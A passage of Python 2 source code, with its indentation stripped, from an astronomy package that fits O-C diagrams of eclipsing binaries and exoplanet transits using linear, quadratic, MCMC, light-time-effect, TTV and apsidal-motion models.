fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.plot(x[prim],(self.new_oc*k)[prim],color+'o',zorder=2)
if not len(sec)==0:
ax1.plot(x[sec],(self.new_oc*k)[sec],color+'o',
mfc='none',markeredgewidth=1,markeredgecolor=color,zorder=2)
if double_ax:
#setting secound axis
ax2=ax1.twiny()
#generate plot to obtain correct axis in epoch
l=ax2.plot(self.epoch,self.oc*k)
ax2.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self.t0)/self.P*2)/2.
ax2.set_xlim(epoch)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
def Plot(self,name=None,no_plot=0,no_plot_err=0,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,bw=False,double_ax=False,
fig_size=None):
'''plotting original O-C with linear fit
name - name of file to saving plot (if not given -> show graph)
no_plot - count of outlier point which will not be plot
no_plot_err - count of errorful point which will not be plot
eps - save also as eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which is time (show in x label)
offset - offset of time
trans - transform time according to offset
title - name of graph
epoch - x axis in epoch
min_type - distinction of type of minimum
weight - weight of data (shown as size of points)
trans_weight - transform weights to range (1,10)
bw - Black&White plot
double_ax - two axes -> time and epoch
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in same order as input data!
'''
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
ax1=fig.add_subplot(111)
#setting labels
if epoch and not double_ax:
ax1.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax1.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax1.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('O - C (min)')
k=minutes
else:
ax1.set_ylabel('O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
if not len(self.model)==len(self.t):
no_plot=0
#primary / secondary minimum
if min_type:
prim=np.where(np.round(self.epoch)==self.epoch)
sec=np.where(np.round(self.epoch)<>self.epoch)
else:
prim=np.arange(0,len(self.epoch),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
warnings.warn('Shape of "weight" is different to shape of "time". Weight will be ignore!')
if bw: color='k'
else: color='b'
if len(self.new_oc)==len(self.oc): errors=GetMax(abs(self.new_oc),no_plot) #remove outlier points
else: errors=np.array([])
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
ax1.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.oc*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i],zorder=1)
if not len(sec)==0:
for i in range(len(w)):
ax1.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.oc*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err)) #remove errorful points
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.errorbar(x[prim],(self.oc*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5,zorder=1)
if not len(sec)==0:
ax1.errorbar(x[sec],(self.oc*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.plot(x[prim],(self.oc*k)[prim],color+'o',zorder=1)
if not len(sec)==0:
ax1.plot(x[sec],(self.oc*k)[sec],color+'o',
mfc='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
#plot linear model
if bw:
color='k'
lw=2
else:
color='r'
lw=1
if len(self.model)==len(self.t):
#model was calculated
if len(self.t)<1000:
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
else:
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
tC=self._t0P[0]+self._t0P[1]*E
p=[]
if 'Q' in self.params:
#Quad Model
p.append(self.params['Q'])
p+=[self.params['P']-self._t0P[1],self.params['t0']-self._t0P[0]]
new=np.polyval(p,E)
if epoch and not double_ax: ax1.plot(E,new*k,color,linewidth=lw)
else: ax1.plot(tC+new-offset,new*k,color,linewidth=lw)
if double_ax:
#setting secound axis
ax2=ax1.twiny()
#generate plot to obtain correct axis in epoch
if len(self.model)==len(self.t): l=ax2.plot(E,new*k,zorder=2)
else: l=ax2.plot(self.epoch,self.oc*k,zorder=2)
ax2.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self.t0)/self.P*2)/2.
ax2.set_xlim(epoch)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
class FitLinear(SimpleFit):
'''fitting of O-C diagram with linear function'''
def FitRobust(self,n_iter=10):
'''robust regresion
return: new O-C'''
self.FitLinear()
for i in range(n_iter): self.FitLinear(robust=True)
self._robust=True
self._mcmc=False
return self.new_oc
def FitLinear(self,robust=False):
'''simple linear regresion
return: new O-C'''
if robust:
err=self.err*np.exp(((self.oc-self.model)/(5*self.err))**4)
k=1
while np.inf in err:
k*=10
err=self.err*np.exp(((self.oc-self.model)/(5*k*self.err))**4)
else: err=self.err
w=1./err
p,cov=np.polyfit(self.epoch,self.oc,1,cov=True,w=w)
self.P=p[0]+self._t0P[1]
self.t0=p[1]+self._t0P[0]
self.params['P']=p[0]+self._t0P[1]
self.params['t0']=p[1]+self._t0P[0]
self.Epoch()
self.model=np.polyval(p,self.epoch)
self.chi=sum(((self.oc-self.model)/self.err)**2)
if robust:
n=len(self.t)*1.06*sum(1./err)/sum(1./self.err)
chi_m=1.23*sum(((self.oc-self.model)/err)**2)/(n-2)
else: chi_m=self.chi/(len(self.t)-2)
err=np.sqrt(chi_m*cov.diagonal())
self.params_err['P']=err[0]
self.params_err['t0']=err[1]
self.tC=self.t0+self.P*self.epoch
self.new_oc=self.oc-self.model
self._robust=False
self._mcmc=False
return self.new_oc
def FitMCMC(self,n_iter,limits,steps,fit_params=None,burn=0,binn=1,visible=True,db=None):
'''fitting with Markov chain Monte Carlo
n_iter - number of MC iteration - should be at least 1e5
limits - limits of parameters for fitting
steps - steps (width of normal distibution) of parameters for fitting
fit_params - list of fitted parameters
burn - number of removed steps before equilibrium - should be approx. 0.1-1% of n_iter
binn - binning size - should be around 10
visible - display status of fitting
db - name of database to save MCMC fitting details (could be analysed later using InfoMCMC function)
'''
#setting pymc sampling for fitted parameters
if fit_params is None: fit_params=['P','t0']
vals0={'P': self._t0P[1], 't0': self._t0P[0]}
vals={}
pars={}
for p in ['P','t0']:
if p in self.params: vals[p]=self.params[p]
else: vals[p]=vals0[p]
if p in fit_params:
pars[p]=pymc.Uniform(p,lower=limits[p][0],upper=limits[p][1],value=vals[p])
def model_fun(**arg):
'''model function for pymc'''
if 'P' in arg: P=arg['P']
else: P=vals['P']
if 't0' in arg: t0=arg['t0']
else: t0=vals['t0']
return t0+P*self.epoch
#definition of pymc model
model=pymc.Deterministic(
eval=model_fun,
doc='model',
name='Model',
parents=pars,
trace=True,
plot=False)
#final distribution
if self._set_err or self._calc_err:
#if known errors of data -> normal/Gaussian distribution
y=pymc.Normal('y',mu=model,tau=1./self.err**2,value=self.t,observed=True)
else:
#if unknown errors of data -> Poisson distribution
#note: should cause wrong performance of fitting, rather use function CalcErr for obtained errors
y=pymc.Poisson('y',mu=model,value=self.t,observed=True)
#adding final distribution and sampling of parameters to model
Model=[y]
for v in pars.itervalues():
Model.append(v)
#create pymc object
if db is None: R=pymc.MCMC(Model)
else:
#saving MCMC fitting details
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
R=pymc.MCMC(Model,db='pickle',dbname=db)
#setting pymc method - distribution and steps
for p in pars:
R.use_step_method(pymc.Metropolis,pars[p],proposal_sd=steps[p],
proposal_distribution='Normal')
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
R.sample(iter=n_iter,burn=burn,thin=binn) #MCMC fitting/simulation
self.params_err={} #remove errors of parameters
for p in ['P','t0']:
#calculate values and errors of parameters and save them
if p in pars:
self.params[p]=R.stats()[p]['mean']
self.params_err[p]=R.stats()[p]['standard deviation']
else:
self.params[p]=vals[p]
self.params_err[p]='---'
print ''
R.summary() #summary of MCMC fitting
if not visible:
#hidden output
sys.stdout=out
f.close()
self.Epoch()
self.tC=self.params['t0']+self.params['P']*self.epoch
self.new_oc=self.t-self.tC
self.model=self.oc+self.new_oc
self.chi=sum(((self.oc-self.model)/self.err)**2)
self._robust=False
self._mcmc=True
return self.new_oc
class FitQuad(SimpleFit):
'''fitting of O-C diagram with quadratic function'''
def FitRobust(self,n_iter=10):
'''robust regresion
return: new O-C'''
self.FitQuad()
for i in range(n_iter): self.FitQuad(robust=True)
self._robust=True
self._mcmc=False
return self.new_oc
def FitQuad(self,robust=False):
'''simple linear regresion
return: new O-C'''
if robust:
err=self.err*np.exp(((self.oc-self.model)/(5*self.err))**4)
k=1
while np.inf in err:
k*=10
err=self.err*np.exp(((self.oc-self.model)/(5*k*self.err))**4)
else: err=self.err
p,cov=np.polyfit(self.epoch,self.oc,2,cov=True,w=1./err)
self.Q=p[0]
self.P=p[1]+self._t0P[1]
self.t0=p[2]+self._t0P[0]
self.params['Q']=p[0]
self.params['P']=p[1]+self._t0P[1]
self.params['t0']=p[2]+self._t0P[0]
self.Epoch()
self.model=np.polyval(p,self.epoch)
self.chi=sum(((self.oc-self.model)/self.err)**2)
if robust:
n=len(self.t)*1.06*sum(1./err)/sum(1./self.err)
chi_m=1.23*sum(((self.oc-self.model)/err)**2)/(n-3)
else: chi_m=self.chi/(len(self.t)-3)
err=np.sqrt(chi_m*cov.diagonal())
self.params_err['Q']=err[0]
self.params_err['P']=err[1]
self.params_err['t0']=err[2]
self.tC=self.t0+self.P*self.epoch+self.Q*self.epoch**2
self.new_oc=self.oc-self.model
self._robust=False
self._mcmc=False
return self.new_oc
def FitMCMC(self,n_iter,limits,steps,fit_params=None,burn=0,binn=1,visible=True,db=None):
'''fitting with Markov chain Monte Carlo
n_iter - number of MC iteration - should be at least 1e5
limits - limits of parameters for fitting
steps - steps (width of normal distibution) of parameters for fitting
fit_params - list of fitted parameters
burn - number of removed steps before equilibrium - should be approx. 0.1-1% of n_iter
binn - binning size - should be around 10
visible - display status of fitting
db - name of database to save MCMC fitting details (could be analysed later using InfoMCMC function)
'''
#setting pymc sampling for fitted parameters
if fit_params is None: fit_params=['Q','P','t0']
vals0={'P': self._t0P[1], 't0': self._t0P[0], 'Q':0}
vals={}
pars={}
for p in ['P','t0','Q']:
if p in self.params: vals[p]=self.params[p]
else: vals[p]=vals0[p]
if p in fit_params:
pars[p]=pymc.Uniform(p,lower=limits[p][0],upper=limits[p][1],value=vals[p])
def model_fun(**arg):
'''model function for pymc'''
if 'Q' in arg: Q=arg['Q']
else: Q=vals['Q']
if 'P' in arg: P=arg['P']
else: P=vals['P']
if 't0' in arg: t0=arg['t0']
else: t0=vals['t0']
return t0+P*self.epoch+Q*self.epoch**2
#definition of pymc model
model=pymc.Deterministic(
eval=model_fun,
doc='model',
name='Model',
parents=pars,
trace=True,
plot=False)
#final distribution
if self._set_err or self._calc_err:
#if known errors of data -> normal/Gaussian distribution
y=pymc.Normal('y',mu=model,tau=1./self.err**2,value=self.t,observed=True)
else:
#if unknown errors of data -> Poisson distribution
#note: should cause wrong performance of fitting, rather use function CalcErr for obtained errors
y=pymc.Poisson('y',mu=model,value=self.t,observed=True)
#adding final distribution and sampling of parameters to model
Model=[y]
for v in pars.itervalues():
Model.append(v)
#create pymc object
if db is None: R=pymc.MCMC(Model)
else:
#saving MCMC fitting details
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
R=pymc.MCMC(Model,db='pickle',dbname=db)
#setting pymc method - distribution and steps
for p in pars:
R.use_step_method(pymc.Metropolis,pars[p],proposal_sd=steps[p],
proposal_distribution='Normal')
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
R.sample(iter=n_iter,burn=burn,thin=binn) #MCMC fitting/simulation
self.params_err={} #remove errors of parameters
for p in ['Q','P','t0']:
#calculate values and errors of parameters and save them
if p in pars:
self.params[p]=R.stats()[p]['mean']
self.params_err[p]=R.stats()[p]['standard deviation']
else:
self.params[p]=vals[p]
self.params_err[p]='---'
print ''
R.summary() #summary of MCMC fitting
if not visible:
#hidden output
sys.stdout=out
f.close()
self.Epoch()
self.tC=self.t0+self.P*self.epoch+self.Q*self.epoch**2
self.new_oc=self.t-self.tC
self.model=self.oc+self.new_oc
self.chi=sum(((self.oc-self.model)/self.err)**2)
self._robust=False
self._mcmc=True
return self.new_oc
class ComplexFit():
'''class with common function for OCFit and RVFit'''
def KeplerEQ(self,M,e,eps=1e-10):
'''solving Kepler Equation using Newton-Raphson method
with starting formula S9 given by Odell&Gooding (1986)
M - Mean anomaly (np.array, float or list) [rad]
e - eccentricity
(eps - accurancy)
output in rad in same format as M
'''
#if input is not np.array
len1=False
if isinstance(M,int) or isinstance(M,float):
#M is float
if M==0.: return 0.
M=np.array(M)
len1=True
lst=False
if isinstance(M,list):
#M is list
lst=True
M=np.array(M)
E0=M+e*np.sin(M)/np.sqrt(1-2*e*np.cos(M)+e**2) #starting formula S9
E=E0-(E0-e*np.sin(E0)-M)/(1-e*np.cos(E0))
while (abs(E-E0)>eps).any():
E0=E
E=E-(E-e*np.sin(E)-M)/(1-e*np.cos(E))
while (E<0).any(): E[np.where(E<0)]+=2*np.pi
while (E>2*np.pi).any(): E[np.where(E>2*np.pi)]-=2*np.pi
if len1: return E[0] #output is float
if lst: return list(E) #output is list
return E
def KeplerEQMarkley(self,M,e):
'''solving Kepler Equation - Markley (1995): Kepler Equation Solver
M - Mean anomaly (np.array, float or list) [rad]
e - eccentricity
output in rad in same format as M
'''
#if input is not np.array
len1=False
if isinstance(M,int) or isinstance(M,float):
#M is float
if M==0.: return 0.
M=np.array(M)
len1=True
lst=False
if isinstance(M,list):
#M is list
lst=True
M=np.array(M)
pi2=np.pi**2
pi=np.pi
#if somewhere is M=0 or M=pi
M=M-(np.floor(M/(2*pi))*2*pi)
flip=np.where(M>pi)
M[flip]=2*pi-M[flip]
M_0=np.where(np.round_(M,14)==0)
M_pi=np.where(np.round_(M,14)==np.round_(pi,14))
alpha=(3.*pi2+1.6*pi*(pi-abs(M))/(1.+e))/(pi2-6.)
d=3*(1-e)+alpha*e
r=3*alpha*d*(d-1+e)*M+M**3
q=2*alpha*d*(1-e)-M**2
w=(abs(r)+np.sqrt(q**3+r**2))**(2./3.)
E1=(2*r*w/(w**2+w*q+q**2)+M)/d
s=e*np.sin(E1)
f0=E1-s-M
f1=1-e*np.cos(E1)
f2=s
f3=1-f1
f4=-f2
d3=-f0/(f1-0.5*f0*f2/f1)
d4=-f0/(f1+0.5*d3*f2+(d3**2)*f3/6.)
d5=-f0/(f1+0.5*d4*f2+d4**2*f3/6.+d4**3*f4/24.)
E=E1+d5
E[flip]=2*pi-E[flip]
E[M_0]=0.
E[M_pi]=pi
if len1: return E[0] #output is float
if lst: return list(E) #output is list
return E
def Epoch(self,t0,P,t=None):
'''convert time to epoch'''
if t is None: t=self.t
epoch=np.round((t-t0)/P*2)/2.
self.epoch=epoch
self._t0P=[t0,P]
self._min_type=np.abs((2*(epoch-epoch.astype('int'))).astype('int'))
return epoch
def InfoGA(self,db,eps=False):
'''statistics about GA fitting'''
info=InfoGAClass(db)
path=db.replace('\\','/')
if path.rfind('/')>0: path=path[:path.rfind('/')+1]
else: path=''
info.Info(path+'ga-info.txt')
info.PlotChi2()
mpl.savefig(path+'ga-chi2.png')
if eps: mpl.savefig(path+'ga-chi2.eps')
for p in info.availableTrace:
info.Plot(p)
mpl.savefig(path+'ga-'+p+'.png')
if eps: mpl.savefig(path+'ga-'+p+'.eps')
mpl.close('all')
def InfoMCMC(self,db,eps=False,geweke=False):
'''statistics about GA fitting'''
info=InfoMCClass(db)
info.AllParams(eps)
for p in info.pars: info.OneParam(p,eps)
if geweke: info.Geweke(eps)
def LiTE(self,t,a_sin_i3,e3,w3,t03,P3):
'''model of O-C by Light-Time effect given by Irwin (1952)
t - times of minima (np.array or float) [days]
a_sin_i3 - semimayor axis original binary around center of mass of triple system [AU]
e3 - eccentricity of 3rd body
w3 - longitude of pericenter of 3rd body [rad]
P3 - period of 3rd body [days]
t03 - time of pericenter passage of 3rd body [days]
output in days
'''
M=2*np.pi/P3*(t-t03) #mean anomally
if e3<0.9: E=self.KeplerEQ(M,e3) #eccentric anomally
else: E=self.KeplerEQMarkley(M,e3)
nu=2*np.arctan(np.sqrt((1+e3)/(1-e3))*np.tan(E/2)) #true anomally
dt=a_sin_i3*AU/c*((1-e3**2)/(1+e3*np.cos(nu))*np.sin(nu+w3)+e3*np.sin(w3))
return dt/day
class OCFit(ComplexFit):
'''class for fitting O-C diagrams'''
def __init__(self,t,oc,err=None):
'''loading times, O-Cs, (errors)'''
self.t=np.array(t)
self.oc=np.array(oc)
if err is None:
#errors not given
self.err=np.ones(self.t.shape)
self._set_err=False
else:
#errors given
self.err=np.array(err)
self._set_err=True
#sorting data...
self._order=np.argsort(self.t)
self.t=self.t[self._order] #times
self.oc=self.oc[self._order] #O-Cs
self.err=self.err[self._order] #errors
self.limits={} #limits of parameters for fitting
self.steps={} #steps (width of normal distibution) of parameters for fitting
self.params={} #values of parameters, fixed values have to be set here
self.params_err={} #errors of fitted parameters
self.paramsMore={} #values of parameters calculated from model params
self.paramsMore_err={} #errors of calculated parameters
self.fit_params=[] #list of fitted parameters
self._calc_err=False #errors were calculated
self._corr_err=False #errors were corrected
self._old_err=[] #given errors
self.model='LiTE3' #used model of O-C
self._t0P=[] #linear ephemeris of binary
self.epoch=[] #epoch of binary
self.res=[] #residua = new O-C
self._min_type=[] #type of minima (primary=0 / secondary=1)
self.availableModels=['LiTE3','LiTE34','LiTE3Quad','LiTE34Quad',\
'AgolInPlanet','AgolInPlanetLin','AgolExPlanet',\
'AgolExPlanetLin','Apsidal'] #list of available models
def AvailableModels(self):
'''print available models for fitting O-Cs'''
print 'Available Models:'
for s in self.availableModels: print s
def ModelParams(self,model=None,allModels=False):
'''display parameters of model'''
def Display(model):
s=model+': '
if 'Quad' in model: s+='t0, P, Q, '
if 'Lin' in model: s+='t0, '
if 'LiTE' in model: s+='a_sin_i3, e3, w3, t03, P3, '
if '4' in model: s+='a_sin_i4, e4, w4, t04, P4, '
if 'InPlanet' in model: s+='P, a, w, e, mu3, r3, w3, t03, P3, '
if 'ExPlanet' in model: s+='P, mu3, e3, t03, P3, '
if 'Apsidal' in model: s+='t0, P, w0, dw, e, '
print s[:-2]
if model is None: model=self.model
if allModels:
for m in self.availableModels: Display(m)
else: Display(model)
def Save(self,path):
'''saving data, model, parameters... to file'''
data={}
data['t']=self.t
data['oc']=self.oc
data['err']=self.err
data['order']=self._order
data['set_err']=self._set_err
data['calc_err']=self._calc_err
data['corr_err']=self._corr_err
data['old_err']=self._old_err
data['limits']=self.limits
data['steps']=self.steps
data['params']=self.params
data['params_err']=self.params_err
data['paramsMore']=self.paramsMore
data['paramsMore_err']=self.paramsMore_err
data['fit_params']=self.fit_params
data['model']=self.model
data['t0P']=self._t0P
data['epoch']=self.epoch
data['min_type']=self._min_type
path=path.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('.')<=path.rfind('/'): path+='.ocf' #without extesion
f=open(path,'wb')
pickle.dump(data,f,protocol=2)
f.close()
def Load(self,path):
'''loading data, model, parameters... from file'''
path=path.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('.')<=path.rfind('/'): path+='.ocf' #without extesion
f=open(path,'rb')
data=pickle.load(f)
f.close()
self.t=data['t']
self.oc=data['oc']
self.err=data['err']
self._order=data['order']
self._set_err=data['set_err']
self._corr_err=data['corr_err']
self._calc_err=data['calc_err']
self._old_err=data['old_err']
self.limits=data['limits']
self.steps=data['steps']
self.params=data['params']
self.params_err=data['params_err']
self.paramsMore=data['paramsMore']
self.paramsMore_err=data['paramsMore_err']
self.fit_params=data['fit_params']
self.model=data['model']
self._t0P=data['t0P']
self.epoch=data['epoch']
self._min_type=data['min_type']
def AgolInPlanet(self,t,P,a,w,e,mu3,r3,w3,t03,P3):
'''model TTV - inner planet (Agol et al., 2005 - sec. 3)
t - times of minima = transits (np.array alebo float) [days]
P - period of transiting exoplanet [days]
a - semimayor axis of transiting exoplanet [AU]
w - longitude of periastrum of transiting exoplanet [rad]
e - eccentricity of transiting exoplanet
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
r3 - radius of orbit of 3rd body [AU]
w3 -longitude of periastrum of 3rd. body [rad]
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
nu=2*np.pi/P3*(t-t03)
dt=-P*mu3*r3*np.cos(nu+w3)*np.sqrt(1-e**2)/(2*np.pi*a*(1-e*np.sin(w)))
return dt
def AgolInPlanetLin(self,t,t0,P,a,w,e,mu3,r3,w3,t03,P3):
'''model TTV - inner planet (Agol et al., 2005 - sec. 3) with linear model
t - times of minima = transits (np.array alebo float) [days]
t0 - time of refernce transit [days]
P - period of transiting exoplanet [days]
a - semimayor axis of transiting exoplanet [AU]
w - longitude of periastrum of transiting exoplanet [rad]
e - eccentricity of transiting exoplanet
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
r3 - radius of orbit of 3rd body [AU]
w3 -longitude of periastrum of 3rd body [rad]
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
dt=t0+P*self.epoch-(self._t0P[0]+self._t0P[1]*self.epoch) #linear model
dt3=self.AgolInPlanet(t,P,a,w,e,mu3,r3,w3,t03,P3) #AgolInPlanet model
return dt+dt3
def AgolExPlanet(self,t,P,mu3,e3,t03,P3):
'''model TTV - exterior planet (Agol et al., 2005 - sec. 4)
t - times of minima = transits (np.array alebo float) [days]
P - period of transiting exoplanet [days]
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
e3 - eccentricity of 3rd exoplanet
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
M=2*np.pi/P3*(t-t03)
while (M>2*np.pi).any(): M[np.where(M>2*np.pi)]-=2*np.pi
while (M<0).any(): M[np.where(M<0)]+=2*np.pi
if e3<0.9: E=self.KeplerEQ(M,e3)
else: E=self.KeplerEQMarkley(M,e3)
nu=2*np.arctan(np.sqrt((1+e3)/(1-e3))*np.tan(E/2))
while (nu>2*np.pi).any(): nu[np.where(nu>2*np.pi)]-=2*np.pi
while (nu<0).any(): nu[np.where(nu<0)]+=2*np.pi
dt=mu3/(2*np.pi*(1-mu3))*P**2/P3*(1-e3**2)**(-3./2.)*(nu-M+e3*np.sin(nu))
return dt
def AgolExPlanetLin(self,t,t0,P,mu3,e3,t03,P3):
'''model TTV - exterior planet (Agol et al., 2005 - sec. 4) with linear model
t - times of minima = transits (np.array alebo float) [days]
t0 - time of refernce transit [days]
P - period of transiting exoplanet [days]
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
e3 - eccentricity of 3rd exoplanet
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
dt=t0+P*self.epoch
dt3=self.AgolExPlanet(t,P,mu3,e3,t03,P3)
return dt+dt3-(self._t0P[0]+self._t0P[1]*self.epoch)
def LiTE3(self,t,a_sin_i3,e3,w3,t03,P3):
'''model of O-C by Light-Time effect caused by 3rd body given by Irwin (1952)
t - times of minima (np.array or float) [days]
a_sin_i3 - semimayor axis of eclipsing binary around center of mass of triple system [AU]
e3 - eccentricity of 3rd body
w3 - longitude of pericenter of 3rd body [rad]
P3 - period of 3rd body [days]
t03 - time of pericenter passage of 3rd body [days]
output in days
'''
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
return dt3
def LiTE34(self,t,a_sin_i3,e3,w3,t03,P3,a_sin_i4,e4,w4,t04,P4):
'''model of O-C by Light-Time effect caused by 3rd and 4th body given by Irwin (1952)
t - times of minima (np.array or float) [days]
a_sin_i3, a_sin_i4 - semimayor axis of eclipsing binary around center of mass of multiple system [AU]
e3, e4 - eccentricity of 3rd/4th body
w3, w4 - longitude of pericenter of 3rd/4th body [rad]
P3, P4 - period of 3rd/4th body [days]
t03, t04 - time of pericenter passage of 3rd/4th body [days]
output in days
'''
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
dt4=self.LiTE(t,a_sin_i4,e4,w4,t04,P4)
return dt3+dt4
def LiTE3Quad(self,t,t0,P,Q,a_sin_i3,e3,w3,t03,P3):
'''model of O-C by Light-Time effect caused by 3rd body given by Irwin (1952) \
with quadratic model of O-C
t - times of minima (np.array or float) [days]
t0 - time of refernce minima [days]
P - period of eclipsing binary [days]
Q - quadratic term [days]
a_sin_i3 - semimayor axis of eclipsing binary around center of mass of triple system [AU]
e3 - eccentricity of 3rd body
w3 - longitude of pericenter of 3rd body [rad]
P3 - period of 3rd body [days]
t03 - time of pericenter passage of 3rd body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
dt=t0+P*self.epoch+Q*self.epoch**2
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
return dt+dt3-(self._t0P[0]+self._t0P[1]*self.epoch)
def LiTE34Quad(self,t,t0,P,Q,a_sin_i3,e3,w3,t03,P3,a_sin_i4,e4,w4,t04,P4):
'''model of O-C by Light-Time effect caused by 3rd and 4th body given by Irwin (1952)\
with quadratic model of O-C
t - times of minima (np.array or float) [days]
t0 - time of refernce minima [days]
P - period of eclipsing binary [days]
Q - quadratic term [days]
a_sin_i3, a_sin_i4 - semimayor axis of eclipsing binary around center of mass of multiple system [AU]
e3, e4 - eccentricity of 3rd/4th body
w3, w4 - longitude of pericenter of 3rd/4th body [rad]
P3, P4 - period of 3rd/4th body [days]
t03, t04 - time of pericenter passage of 3rd/4th body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
dt=t0+P*self.epoch+Q*self.epoch**2
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
dt4=self.LiTE(t,a_sin_i4,e4,w4,t04,P4)
return dt+dt3+dt4-(self._t0P[0]+self._t0P[1]*self.epoch)
def Apsidal(self,t,t0,P,w0,dw,e,min_type):
'''Apsidal motion on O-C diagram (Gimenez&Bastero,1995)
t0 - time of refernce minima [days]
P - period of eclipsing binary [days]
w0 - initial position of pericenter [rad]
dw - angular velocity of line of apsides [rad/period]
e - eccentricity
min_type - type of minimas [0 or 1]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
w=w0+dw*self.epoch #position of pericenter
nu=-w+np.pi/2 #true anomaly
b=e/(1+np.sqrt(1-e**2))
sum1=0
sum2=0
tmp=0
for n in range(1,10):
tmp=(-b)**n*(1/n+np.sqrt(1-e**2))*np.sin(n*nu)
#primary
sum1+=tmp
#secondary
if n%2: sum2-=tmp
else: sum2+=tmp
oc1=P/np.pi*sum1
oc2=P/np.pi*sum2
dt=np.zeros(t.shape)
dt[np.where(min_type==0)[0]]=oc1[np.where(min_type==0)[0]] #primary
dt[np.where(min_type==1)[0]]=oc2[np.where(min_type==1)[0]] #secondary
return dt+(t0+P*self.epoch)-(self._t0P[0]+self._t0P[1]*self.epoch)
def PhaseCurve(self,P,t0,plot=False):
'''create phase curve'''
f=np.mod(self.t-t0,P)/float(P) #phase
order=np.argsort(f)
f=f[order]
oc=self.oc[order]
if plot:
mpl.figure()
if self._set_err: mpl.errorbar(f,oc,yerr=self.err,fmt='o')
else: mpl.plot(f,oc,'.')
return f,oc
def Chi2(self,params):
'''calculate chi2 error (used as Objective Function for GA fitting) based on given parameters (in dict)'''
param=dict(params)
for x in self.params:
